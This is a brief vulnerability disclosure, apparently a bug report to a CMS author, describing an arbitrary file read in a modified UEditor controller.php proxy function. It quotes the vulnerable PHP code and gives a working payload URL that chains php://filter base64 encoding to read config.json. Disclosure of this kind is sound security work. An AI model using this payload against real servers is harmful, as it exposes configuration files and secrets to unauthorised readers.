This cms uses ueditor(A rich text editor) which is developed by Baidu(Top 100 Global Enterprises),and after the author's secondary development,an arbitrary file read vulnerability has occurred,details are as follows.
in the file/static/ueditor/php/controller.php,author add the proxy function which causes the Path Traversal Problem and could read any file on the system with cms installed.
controller.php
if(strlen($data) > 100){
header("Content-type: image/jpeg");
if($maxwidth > 0){
$image = imagecreatefromstring($data);
if($image){
$width = imagesx($image);
$height = imagesy($image);
$sw=0;
if($width > $height){
if($width > $maxwidth){
$sw = $maxwidth;
$sh = $height * $sw / $width;
}
}else{
if($height > $maxwidth){
$sh = $maxwidth;
$sw = $width * $sh / $height;
}
}
if($sw > 0){
$newimage = imagecreatetruecolor($sw,$sh);
imagecopyresampled($newimage, $image, 0, 0, 0, 0, $sw, $sh,
$width, $height);
imagejpeg($newimage,null,70);
imagedestroy($newimage);
}else{
imagejpeg($image,null,70);
}
imagedestroy($image);
}
}else{
echo $data;
}
}
payload:
http://localhost/static/ueditor/php/controller.php?
action=proxy&remote=php://filter/convert.base64-encode|convert.base64-
encode|convert.base64-encode|convert.base64-encode|convert.base64-
encode|convert.base64-encode/resource=config.json&maxwidth=-1&referer=test
After several times base64-decode,you could see the real content.
If the author see this message, I hope you fix the vulnerability as soon as possible。